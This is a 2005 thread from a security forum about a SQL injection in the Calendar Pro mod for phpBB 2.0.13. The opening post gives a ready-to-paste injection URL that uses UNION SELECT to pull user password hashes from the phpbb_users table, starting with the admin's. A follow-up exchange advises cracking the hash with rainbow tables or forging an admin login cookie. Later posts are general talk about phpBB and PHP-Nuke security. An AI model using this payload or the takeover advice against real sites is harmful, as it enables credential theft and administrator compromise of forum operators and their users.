 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Another one! Phpbb 2.0.13 + Calendar Mod |
 |
 Posted: Tue Apr 05, 2005 10:11 pm |
 |
|
| murdock |
| Advanced user |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
 |
|
 |
|
Another SQL injection discovered in another mod for phpbb 2.0.13, published at milw0rm's page and found by Cerebrums again.
Now seems to be the in the "Calendar Pro" mod (NOTE: Not the "Topic Calendar" mod!).
Here's the exploit:
http://www.milw0rm.com/id.php?id=910
But, once again, I prefer to simply paste the injection url in the browser:
| Code: | http://[target]/[phpbb_folder]/cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=2/*
|
This one give's the admin password hash, simply change the "user_id=" number to get the hash of another user.
I made a screenshot to view where appears the hash in the page if the exploit worked: Screenshot
Salut! |
|
|
|
|
|
Re: Another one! Phpbb 2.0.13 + Calendar Mod |
|
| Posted: Wed Apr 06, 2005 3:08 am |
|
|
| xtremeshell |
| Regular user |
 |
|
| Joined: Mar 21, 2005 |
| Posts: 6 |
| Location: Somewhere In Hell !! |
|
|
|
|
|
|
"This one give's the admin password hash, simply change the "user_id=" number to get the hash of another user. "
=================================================
After I have the admin hass, How do I crack it ?? ( Sorry for my stupid questions ) Should I use some software ?? such as JTR ?? Or Simply, how to exploit the admin panel with that admin hass ???
thX |
|
|
|
|
| Posted: Wed Apr 06, 2005 7:25 am |
|
|
| murdock |
| Advanced user |
|
|
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
| You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!). |
|
|
|
|
| Posted: Wed Apr 06, 2005 8:11 am |
|
|
| xtremeshell |
| Regular user |
|
|
| Joined: Mar 21, 2005 |
| Posts: 6 |
| Location: Somewhere In Hell !! |
|
|
|
|
|
|
| murdock wrote: | | You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!). |
Mm.... Rainbow Tables ??  I'll find it.... And maybe I'll prefer to use the hash as a cookie maybe ?? hehehhehehehe.... Well, let's go !!
Thx for the rept |
|
|
|
|
| Posted: Wed Apr 06, 2005 11:45 am |
|
|
| shai-tan |
| Valuable expert |
 |
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
| Why cant people just put their time into phpBB itself. Theres not many sites that Ive seen that use the calender and download mods. Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims. |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Wed Apr 06, 2005 12:58 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| shai-tan wrote: | ...
Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims. |
Yeah, sure, that webmasters and admins are not pleased with new defacement waves 
Anyway - phpbb is allready very researched piece of software and new security holes are more and more hard to find  |
|
|
|
|
| Posted: Wed Apr 06, 2005 1:15 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Yes well we are just going to have to wait till 3.0 comes out  ....I remember all the posts long ago about how secure 2.0.0 was going to be...... now look at it..... |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Wed Apr 06, 2005 2:28 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Yep, all the new, rewritten from scratch versions are good target for security audit, thats true  |
|
|
|
|
| Posted: Wed Apr 06, 2005 3:03 pm |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| waraxe wrote: |
Anyway - phpbb is allready very researched piece of software and new security holes are more and more hard to find |
yes, ive seen so many security holes beeing found at PHPbb, but now i think it more n more secure , because there are so many fix since it was born , lol
so , now the attacking will against the module in the phorum
like PHPnuke i think  |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Fri Apr 08, 2005 12:25 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
| Yes phpNuke I think is in for a exploit spell. Its too big. Small and simple things are always the most secure |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
| Posted: Fri Apr 08, 2005 3:02 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| shai-tan wrote: | | Yes phpNuke I think is in for a exploit spell. Its too big. Small and simple things are always the most secure |
Phpnuke is really amazing piece of software - very big and strong community, very ineffective and insecure coding (kinda bloatware). It contains many-many legacy code fragments, absolutely not used novadays. And whats more bad - all those add-ons and stuff - most of them are examples of insecure coding. There are good derivations of the phpnuke - like cpgnuke and stuff, but i think, its time to rewrite phpnuke from scratch - why not as version 8.0 
By the way - i use phpnuke myself (as you all can see ) and its my own derivation, so called "waraxe edition". I was optimizing nuke core engine and all the modules and perfomance was growing 200%-300%.
Just look at page generation times and compare it to other, classical nuke sites |
|
|
|
|
|
|
|
|
| Posted: Fri Apr 08, 2005 3:19 pm |
|
|
| wyk |
| Regular user |
|
|
| Joined: Mar 15, 2005 |
| Posts: 10 |
|
|
|
|
|
|
|
| waraxe, are you ready to share this derivation with others? |
|
|
|
|
| Posted: Fri Apr 08, 2005 3:35 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| wyk wrote: | | waraxe, are you ready to share this derivation with others? |
It's on early stage. Still i have not finished modules "downloads", "weblinks" and "votes". And there is more stuff to finish. Maybe i will release it near future, let's see.
But one thing is sure - my nuke derivation is meant to be as secure as possible (for nuke ). Right now there is implemented countermeasures against path disclosure, some obstacles against sql injections and all the suspicious activity and all the internal errors will be logged. And so far - from janyary 2005 - it is not fallen apart yet
So seems that waraxe edition alpha release is coming out before summer 2005 |
|
|
|
|
|
|
|
|
| Posted: Fri Apr 08, 2005 4:40 pm |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
i just think about that sometimes coz we all know phpnuke has a big community, why dont phpnuke make a restriction of module, or maybe all the include module should have some 'security test' and permit from them
waraxe: about your own modification , i think it would be great if u can share it.. n better if u post one to "php nuke' developer so they could learn it.. cant wait for it |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Sat Apr 09, 2005 4:53 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Yes it will be very popular. I want a beta now to be honest.
Why not call it Php-Waraxe-Nuke or just Waraxe-Nuke. Then we can tell Php-Nuke.org to shove 8.0 up their A*s |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 85
Members: 0
Total: 85
